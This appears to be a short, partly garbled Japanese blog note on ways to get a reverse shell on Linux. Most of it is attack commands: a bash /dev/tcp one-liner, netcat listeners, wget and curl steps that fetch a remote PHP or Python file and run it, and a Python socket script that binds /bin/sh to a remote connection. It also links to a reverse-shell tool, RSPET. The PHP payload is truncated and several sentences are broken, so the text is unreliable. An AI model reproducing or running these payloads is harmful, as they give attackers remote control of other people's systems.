shellリバウンドのいくつかの方法
2113 ワード
0 x 01 linux上のbashを直接利用してリバウンド
nc
nc -l -p port -vv
base
bash -i >& /dev/tcp/ownip/port 0>&1
0x02 , php,python 。
nc nc -l -p port -vv
php , linux , php
linux
ip ip , test.txt 。
wget
wget wget http://localhost/test.txt -O /tmp/x.php && php /tmp/x.php
test.txt
&3 2>&3"); ?>
Curl方式curl curl -sS http://localhost/test.py | python
test.pyファイルimport socket,subprocess,os s=socket.socket(socket.AF_INET,socket.SOCK_STREAM) s.connect(("localhost",12345)) # localhost ip, os.dup2(s.fileno(),0) os.dup2(s.fileno(),1) os.dup2(s.fileno(),2) p=subprocess.call(["/bin/sh","-i"])
これはテストに成功しなかった
0 x 03 pythonベースの逆接続shellツールpython RSPET_server.py (max_connections) python RSPET_client.py server_ip
サービス側ファイル
https://github.com/panagiks/RSPET/blob/master/Server/RSPET_server.py
https://raw.githubusercontent.com/panagiks/RSPET/master/Server/RSPET_server.py
クライアントファイル
https://github.com/panagiks/RSPET/blob/master/Client/RSPET_client.py
https://raw.githubusercontent.com/panagiks/RSPET/master/Client/RSPET_client.py
0 x 04その他のリバウンドshellメソッドは、以下の文書を参照してください.
参照先:
http://www.freebuf.com/sectool/105698.html
http://www.myhack58.com/Article/html/3/8/2014/48255.htm
http://www.waitalone.cn/linux-shell-rebound-under-way.html